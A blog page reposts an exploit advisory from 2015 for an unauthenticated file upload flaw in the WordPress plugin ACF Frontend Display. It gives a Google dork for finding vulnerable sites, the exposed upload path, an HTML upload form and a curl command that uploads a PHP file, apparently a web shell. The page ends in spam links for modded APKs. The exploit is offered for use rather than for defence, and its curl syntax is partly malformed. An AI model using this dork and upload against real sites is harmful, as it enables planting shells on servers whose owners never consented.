WordPress Plugins ACF Frontend Display File Upload Vulnerability

In XIAOMI 30 views
#- Title: WordPress Plugins ACF Frontend Display File Upload Vulnerability
#- Author: TUNISIAN CYBER
#- Date: 2015-07-07
#- Developer : dadmor
#- Link Download : github. com/dadmor/ACF_frontend_display
#- Google Dork: inurl:”/plugins/acf-frontend-display/”
#- Fixed in Version : –
#- Tested on : windows
=======================================================
— Proof Of Concept —


Vulnerability : site/wp-content/plugins/acf-frontend-display/js/blueimp-jQuery-File-Upload-d45deb1/server/php/index.php
When Vulnerable : Like jquery file upload
Method 
CSRF : 
<form method=”POST” action=”http://3xploi7.blogspot.com/wp-content/plugins/acf-frontend-display/js/blueimp-jQuery-File-Upload-d45deb1/server/php/index.php”
enctype=”multipart/form-data”>
<input type=”file” name=”files[]” /><button>Upload</button>
</form>
With curl  :

curl -k -X POST -F "action=upload" -F "3xploi7.php" "site:wp-content/plugins/acf-frontend-display/js/blueimp-jQuery-File-Upload-d45deb1/server/php/index.php"

Need Shell Path ? Click Here

Tags: #File Upload #Wordpress

Free Plants Vs Zombies 1 Mod Apk Terbaru
Free Plants Vs Zombies 1 Mod Apk Terbaru
Free Plants Vs Zombies 1 Mod Apk
Download Pes 2018 Android Release APK terbaru
Download Pes 2018 Android Release APK terbaru
Download FTS Mod PES 2018 APK +
Summertime Saga 0.14.1 APK RELEASE [NEW UPDATE] Terbaru!!
Summertime Saga 0.14.1 APK RELEASE [NEW UPDATE] Terbaru!!
Summertime Saga APK v0.14.1 Terbaru– Rumah Android
Must read×

Top
error: Content is protected !!